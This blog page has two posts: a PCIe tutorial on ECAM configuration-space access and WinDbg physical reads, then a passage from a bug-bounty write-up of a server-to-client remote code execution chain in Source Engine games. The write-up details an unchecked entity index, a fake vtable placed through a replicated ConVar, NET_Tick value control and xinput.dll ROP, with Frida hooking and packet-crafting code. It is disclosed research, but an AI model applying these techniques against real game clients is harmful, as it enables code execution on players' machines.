It is a common misunderstanding among beginners that all physical memory is RAM. When software talks to a PCI device in the PCI region, it is not reading and writing RAM. The device instead receives a packet (a TLP, Transaction Layer Packet) from the Root Complex that is automatically generated for you by your CPU the moment an address inside the PCI region is read/written. You do not create these packets in software; all of these packets are generated completely behind the scenes as soon as this memory is accessed. In software, you cannot even see or capture these packets; a special hardware testing device is required to intercept and view the packets being sent. More on this later.

If it helps, think of physical memory instead as a mapping of devices. RAM is a device which is mapped into physical memory for you. PCI also has regions mapped automatically for you. Though they are distinct and act very differently, they look the same to software.

In the following diagram, we can see how a typical system maps virtual memory to physical memory. Note that there are two regions of RAM and two regions of PCI memory. This is because certain older PCI devices can only address 32 bits of memory. Therefore, some RAM is moved up above 4GB if it does not fit within the window of addresses under 4GB. Since your processor supports 64-bit addresses, this is not an issue. Additionally, a second window is created above the 4GB line for PCI devices which do support 64-bit addresses. Because the region below 4GB can be very constrained, it is best for devices to move as much memory above 4GB as possible, so as not to clutter the space below.

[Diagram: ranges of virtual address space mapped onto RAM and PCI regions of physical memory]

A very simplified view of how ranges of virtual addresses could be mapped to physical addresses. This ignores a large number of "special" regions in physical memory, but showcases how RAM and device memory are not the same.

Let’s talk first about the type of memory we’ve already seen: configuration space.

Configuration space is located in a section of memory called ECAM, which stands for Enhanced Configuration Access Mechanism. Because it is a form of device memory, in order to access this memory from the kernel (which uses virtual memory), the kernel must ask the memory manager to map this physical memory to a virtual address. Then, software instructions can use the virtual address of the mapping to read and write the physical addresses. On Windows, locating and mapping this memory is handled partially by pci.sys, partially by acpi.sys, and partially by the kernel (specifically the HAL).

NOTE: Typically the way device memory is mapped in Windows is through MmMapIoSpaceEx, which is an API drivers can use to map physical device memory. However, in order to do configuration space accesses, software must use HalGetBusDataByOffset and HalSetBusDataByOffset to ensure that the internal state of pci.sys is kept in synchronization with the configuration space reads/writes you are doing. If you try to map and change configuration space yourself, you might desync state from pci.sys and cause a BSOD.

NOTE: Where in physical memory the ECAM/PCI regions are located is platform dependent. The firmware at boot time assigns all special regions of physical memory on the system, then advertises the location of these regions to the OS during boot. On x86-64 systems, the ECAM region is communicated from firmware through ACPI using a table (a structure) called MCFG. It is not important for now to know what specific protocol is used to retrieve this info; just understand that the OS retrieves the addresses of these regions from the firmware, which decided where to put them.

So in order to do a configuration space access, the kernel must map configuration space (ECAM) into virtual memory. This is what such a mapping would look like:

[Diagram: the ECAM region of physical memory mapped into virtual memory]

A mapping of ECAM to virtual memory. Horribly not to scale.

After this, the kernel is able to communicate with the configuration space of the device by using the virtual mapping. But what does this configuration space look like? Well, it's just a series of blocks of the configuration space structures we talked about above. Each possible BDF a device could have is given space in ECAM to configure it. It is laid out in such a way that the BDF of the device tells you exactly where its configuration space is in ECAM. That is, given a BDF, we can calculate the offset to add to the base of the ECAM region in order to talk to the device, because the ECAM block for every function is the same size.

[Diagram: ECAM laid out as one block of config space per possible BDF]

If a device is not present, the system reads back all FFs (all 1s in binary), showing that the device is not currently active on the system.

From this diagram, we can start to see how the enumeration of PCIe actually takes place. When we read back valid config space data, we know a device exists at that BDF. If we read back FFs instead, we know the device is not in that slot or function. Of course, we don't brute force every address in order to enumerate all devices, as that would be costly due to the overhead of the MMIO. But a smart version of this brute force is how we quickly enumerate all devices that are powered up and responding to us on config space.
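As a sketch of what that scan logically looks like (simplified, in Python, and assuming a hypothetical read_config_u16 helper that performs the actual uncached MMIO read of ECAM):

ECAM_BASE = 0xD0000000  # platform dependent; we find this system's value later

def ecam_address(bus: int, dev: int, fn: int, offset: int = 0) -> int:
    # Each function gets a 4KB block of config space within ECAM.
    return ECAM_BASE + ((bus << 20) | (dev << 15) | (fn << 12)) + offset

def scan_bus(bus: int, read_config_u16):
    for dev in range(32):          # 32 possible devices per bus
        for fn in range(8):        # 8 possible functions per device
            vendor = read_config_u16(bus, dev, fn, 0x00)
            if vendor == 0xFFFF:   # all 1s: nothing responded here
                if fn == 0:
                    break          # no function 0 means no device at all
                continue
            print(f"{bus:02x}:{dev:02x}.{fn} vendor {vendor:04x}")
            # A real enumerator also checks Header Type (offset 0x0E): if
            # bit 7 is clear it skips functions 1-7, and if the function is
            # a bridge it recurses into the new bus behind it.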

Putting it all together - A software config space access

Now that we've seen how config space is accessed, we can put the two sides together (the hierarchy and the MMIO) to see the full path of an instruction reading config space from kernel mode.

[Diagram: the full path of a config space read, from a kernel-mode instruction through the ECAM mapping and Root Complex to the device]

Let’s step through the entire path taken here (from left to right):

  • Some code running in kernel mode reads an offset from the ECAM virtual mapping.
  • The virtual mapping is translated by the page tables of the CPU into a physical address into ECAM.
  • The physical address is read, causing an operation to happen in the internal CPU Interconnect to inform the Root Complex of the access.
  • The Root Complex generates a packetized version of the request as a TLP that says “Read the value at offset 0x0 for device 02:00.0” and sends it through the hierarchy.
  • The display controller on Bus 2 receives the TLP and sees that it is a configuration space read. It now knows to respond with a configuration space completion TLP that contains the contents of the value at offset 0x0.

Now let’s look at the response:

[Diagram: the path of the completion TLP from the device back to the Root Complex and CPU]

The path of the response is much less interesting. The device responds with a special TLP containing the value at offset 0 (which we know is the Vendor ID). That packet makes its way back to the Requester (the Root Complex), and the interconnect informs the CPU to update the value of rax to 0x10DE, the vendor ID of the NVIDIA graphics card. The next instruction then begins to execute on the CPU.

As you can imagine, accesses done this way can be quite a lot slower than accesses to RAM, with all of this TLP generation. This is indeed true, and it is one of the main reasons there are other ways besides this MMIO method to talk to a device. In the next post, I will go into more detail about the other method, DMA, and its vital importance in ensuring that software can transfer memory as fast as possible between the CPU and the device.

Exercise: Accessing ECAM manually through WinDbg

So, we took a look at how a config space access theoretically happens, but let’s do the same thing ourselves with a debugger. To do that, we will want to:

  • Locate where ECAM is on the system.
  • Calculate the offset into ECAM to read the Vendor ID of the device. For this, I chose the Multimedia Device @ 02:00.1, which is on the NVIDIA graphics card.
  • Perform a physical memory read at that address to retrieve the value.

The first step is to locate ECAM. This part is a little tricky given that the location of ECAM comes through ACPI, specifically the MCFG table. This is the table firmware uses to tell the OS where ECAM is located in the physical memory map of the system. There is a lot to talk about with ACPI and how it is used in combination with PCI, but for now I'll skip to the parts relevant to our goal.

In our debugger, we can dump the cached copies of all ACPI tables by using !acpicache. To dump MCFG, click on the link MCFG to dump its contents, or type !acpitable MCFG manually:

8: kd> !acpicache
Dumping cached ACPI tables...
  XSDT @(fffff7b6c0004018) Rev: 0x1 Len: 0x0000bc TableID: SLIC-WKS
  MCFG @(fffff7b6c0005018) Rev: 0x1 Len: 0x00003c TableID: SLIC-WKS
  FACP @(fffff7b6c0007018) Rev: 0x4 Len: 0x0000f4 TableID: SLIC-WKS
  APIC @(fffff7b6c0008018) Rev: 0x2 Len: 0x000afc TableID: SLIC-WKS
  DMAR @(fffff7b6c000a018) Rev: 0x1 Len: 0x0000c0 TableID: SLIC-WKS
  HPET @(fffff7b6c015a018) Rev: 0x1 Len: 0x000038 TableID: SLIC-WKS
  TCPA @(ffffdc89b07209f8) Rev: 0x2 Len: 0x000064 TableID: EDK2    
  SSDT @(ffffdc89b0720a88) Rev: 0x2 Len: 0x0003b3 TableID: Tpm2Tabl
  TPM2 @(ffffdc89b0720e68) Rev: 0x3 Len: 0x000034 TableID: EDK2    
  SSDT @(ffffdc89b07fc018) Rev: 0x1 Len: 0x0013a1 TableID: Plat_Wmi
  UEFI @(ffffdc89b07fd3e8) Rev: 0x1 Len: 0x000042 TableID: 
  BDAT @(ffffdc89b07fd458) Rev: 0x1 Len: 0x000030 TableID: SLIC-WKS
  MSDM @(ffffdc89b07fd4b8) Rev: 0x3 Len: 0x000055 TableID: SLIC-WKS
  SLIC @(ffffdc89b07fd538) Rev: 0x1 Len: 0x000176 TableID: SLIC-WKS
  WSMT @(ffffdc89b07fd6d8) Rev: 0x1 Len: 0x000028 TableID: SLIC-WKS
  WDDT @(ffffdc89b0721a68) Rev: 0x1 Len: 0x000040 TableID: SLIC-WKS
  SSDT @(ffffdc89b2580018) Rev: 0x2 Len: 0x086372 TableID: SSDT  PM
  NITR @(ffffdc89b26063b8) Rev: 0x2 Len: 0x000071 TableID: SLIC-WKS
  ASF! @(ffffdc89b2606548) Rev: 0x20 Len: 0x000074 TableID:  HCG
  BGRT @(ffffdc89b26065e8) Rev: 0x1 Len: 0x000038 TableID: TIANO   
  DSDT @(ffffdc89b0e94018) Rev: 0x2 Len: 0x021c89 TableID: SLIC-WKS
8: kd> !acpitable MCFG
HEADER - fffff7b6c0005018
  Signature:               MCFG
  Length:                  0x0000003c
  Revision:                0x01
  Checksum:                0x3c
  OEMID:                   HPQOEM
  OEMTableID:              SLIC-WKS
  OEMRevision:             0x00000001
  CreatorID:               INTL
  CreatorRev:              0x20091013
BODY - fffff7b6c000503c
fffff7b6`c000503c  00 00 00 00 00 00 00 00-00 00 00 d0 00 00 00 00  ................
fffff7b6`c000504c  00 00 00 ff 00 00 00 00                          ........

To understand how to read this table, unfortunately we need to look at the ACPI specification. Instead of making you do that, I will save you the pain and pull the relevant section here:

[Image: the MCFG table layout from the ACPI specification]

As the !acpitable command has already parsed and displayed everything up to Creator Revision in this table, the first 8 bytes of the BODY are the 8 bytes of Reserved memory at offset 36. So we skip those 8 bytes and find the following structure:

[Image: the configuration space base address allocation structure from the ACPI specification]

The first 8 bytes of this structure are the base address of the ECAM region. Since the structure follows the 8 reserved bytes, the ECAM base address is found at offset 8 into the BODY.

BODY - fffff7b6c000503c
fffff7b6`c000503c  00 00 00 00 00 00 00 00-00 00 00 d0 00 00 00 00  ................
fffff7b6`c000504c  00 00 00 ff 00 00 00 00                          ........

For this system, ECAM is located at address: 0xD0000000. (Don’t forget to read this in little endian order)
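If you prefer to let code do the byte slicing, here is a small Python sketch that parses the allocation structure out of the raw BODY bytes above (layout per the ACPI spec: a u64 base address, a u16 PCI segment group, a u8 start bus, a u8 end bus, then 4 reserved bytes, all little endian):

import struct

# BODY bytes from !acpitable MCFG, after skipping the 8 reserved bytes
body = bytes.fromhex("000000d000000000" "0000" "00" "ff" "00000000")

base, segment, start_bus, end_bus = struct.unpack_from("<QHBB", body)
print(hex(base))                    # 0xd0000000 -> the ECAM base address
print(segment, start_bus, end_bus)  # segment 0, buses 0x00 through 0xff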

To verify we got the correct address, let's read the vendor ID of 00:00.0, which is also the first 2 bytes of ECAM. We will do this using the !dw command, which stands for dump physical word (the exclamation point means physical). This command requires that you specify a caching type, which for our case will always be [uc] for uncached. It also takes a length: L1 specifies that we want to read one word.

NOTE: It is important that we always match the size of the target device memory to the size we are reading from software. This means, if the value we want to read is a 16-bit value (like Vendor ID), then we must perform a 16-bit read. Performing a 32-bit read might change the result of what the device responds with. For configuration space, we are okay to read larger sizes for Vendor ID, but this is not true in all cases. It’s good to get in the habit of matching the read size to the target size to avoid any unexpected results. Remember: Device memory is not RAM.

Putting that all together, we read the VendorID of 00:00.0 like so:

8: kd> !dw [uc] D0000000 L1
#d0000000 8086

The resulting value we read is 0x8086, which happens to be the vendor ID of Intel. To verify this is correct, let’s dump the same thing using !pci.

8: kd> !pci 100 0 0 0

PCI Configuration Space (Segment:0000 Bus:00 Device:00 Function:00)
Common Header:
    00: VendorID       8086 Intel Corporation

Reading VendorID from a specific Function

Now, to calculate the ECAM address of another function we wish to talk to (the NVIDIA card at 02:00.1), we need to perform an "array access" manually by calculating the offset into ECAM using the BDF of the target function and some bit math.

The way to calculate this is present in the PCIe specification, which assigns a certain number of bits of ECAM for bus, device, and function to calculate the offset:

| 27 - 20 | 19 - 15 | 14 - 12     |  11 - 0       |
| Bus Nr  | Dev Nr  | Function Nr | Register      |

By filling in the BDF and shifting and ORing the results based on the bit position of each element, we can calculate an offset to add to ECAM.

I will use Python, but you can use whatever calculator you'd like:

>>> hex(0xD0000000 + ((2 << 20) | (0 << 15) | (1 << 12)))
'0xd0201000'

This means that the ECAM region for 02:00.1 is located at 0xD0201000.

Now to read the value of the VendorID from the function:

8: kd> !dw [uc] D0201000 L1
#d0201000 10de

The result was 0x10de, which we know from above is NVIDIA Corporation! That means we successfully read the first value from ECAM for this function.

Conclusion

This single post ended up being a lot longer than I expected! Rather than continuing in this single post, I will instead split things up and flesh out the series over time. There are so many topics I would like to cover about PCIe and only so much free time, but in the next post I will go into more detail about device BARs (a form of device-specific MMIO) and DMA (Direct Memory Access). This series will continue using the same tenets as before, focusing more on understanding than on specific details.

Hopefully you enjoyed this small look into the world of PCIe! Be back soon with more.

Part 2 - Not yet available

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Introduction

Hey guys, it's been a while. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I'm proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles, including TF2, CS:GO, and L4D2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, and experimented with the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you know that I was using SourceMod as a way to script up my local dedicated server to test whether the bugs I found were valid. While auditing this time around, it quickly became apparent that most of the obvious bugs in any of the original Source 2013 codebases were already patched. But without confirming the bugs as fixed myself, I couldn't rule out their validity, so a lot of my initial time was spent scripting up SourceMod plugins and testing. While SourceMod itself has a pretty fleshed-out scripting environment, it uses the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn't already in SourceMod required compiling C++ plugins against their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That's why I decided to try out Frida after hearing good things from friends who work in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.
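To give a feel for how small the "client" half can be, here is a minimal sketch of a Python client using Frida's standard Python bindings (agent.js is a placeholder name for your compiled agent script):

import frida

# Attach to the running game process
session = frida.attach("hl2.exe")

# Load the agent script (the "server") into the game
with open("agent.js") as f:
    script = session.create_script(f.read())

# Messages the agent emits via send() arrive here
script.on("message", lambda message, data: print(message))
script.load()

input("Press enter to detach...")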

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilizes the ret-sync project to communicate with a loaded copy of IDA at runtime. What this lets me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their addresses. The intent was to make the exploit scripts much more stable across game binary updates (which happen every few days for games like CS:GO).

Here's an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll in the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds in pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these types of bugs is to exploit some buffer overflow, build a ROP chain using the module xinput.dll, which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find this on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can be relocated just fine, and sometimes it can be found at a different address if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, which inherently defeats ASLR: you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.
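
You can see this for yourself from a Frida script (a sketch; the exact xinput module filename varies by game and SDK version):

// If ASLR is disabled for the module, this base is the same practically every
// launch, on every machine, so one static ROP chain works everywhere.
const xinput = Process.getModuleByName("xinput1_3.dll");
console.log(`xinput base: ${xinput.base}`);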

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem too concerned by this, as it’s been exploited over and over again through the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice, I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. Carving out areas of heap memory for your exploit requires careful consideration of specifically sized holes of memory and the timing at which those holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The value sent back is either the integer value of the ConVar or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs, most because they were trivial stack-based buffer overflows, or because they were present in one game but not the others.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

    [...]
}

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check that this value is sane, and crash the game if it wasn’t. But this is not what happens in practice: in release builds of the game, Assert statements are not compiled in at all. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. Since m_EntityCacheInfo is at a static global offset, we can easily calculate the proper value of entnum for our exploit by locating the offset of m_EntityCacheInfo in any given version of client.dll and working out which entnum produces our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

Altogether, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable, as long as the address it is read from is aligned to an 8 byte boundary (since sizeof(EntityCacheInfo_t) == 8). This becomes important for exploit chaining later.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

[Screenshot: IDA disassembly of the PreDataUpdate virtual call, ending in call dword ptr [eax+24]]

Notice call dword ptr [eax+24]. This implies that the vtable index is 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const char *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug triggers, the engine will treat &m_pszString as the location of the object’s pointer, meaning the string contents of m_pszString become the object’s structure, starting with its vtable pointer. It will then call a function pointer at *((*m_pszString)+0x18), i.e. vtable index 6 as established above. As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!
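
To keep the dereference chain straight, here is a small hypothetical helper that mimics what the engine will do with our fake object, handy for sanity-checking the setup in Frida before sending the real packet:

// Emulate the virtual call dispatch performed on our fake entity, where
// fakeEnt is the value of m_pszString (the address of the string buffer).
function previewVirtualCall(fakeEnt: NativePointer): NativePointer {
    const vtable = fakeEnt.readPointer();            // first dword of the string = fake vtable pointer
    const target = vtable.add(6 * 4).readPointer();  // slot 6: call dword ptr [eax+24]
    return target;                                   // this value ends up in eip
}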

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability require that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated, and whose &m_pszString is aligned correctly so that GetClientNetworkable can return it.

This can be seen by what GetClientNetworkable looks like in x64dbg:

[Screenshot: x64dbg disassembly of GetClientNetworkable]

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. In this build, it sits at 0x10C6B788 in client.dll:

[Screenshot: the sv_mumble_positionalaudio ConVar at 0x10C6B788 in client.dll]

This means that to calculate the address of m_pszString, we add 0x1C: 0x10C6B788 + 0x1C = 0x10C6B7A4. In this build, entitylist is at an offset aligned to 4 (0xC580B4). So, now we can calculate whether this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a known location the server can control where we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign it an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After scripting it up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

[Screenshot: Frida output confirming the tick value is controlled by the NET_Tick packet]

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

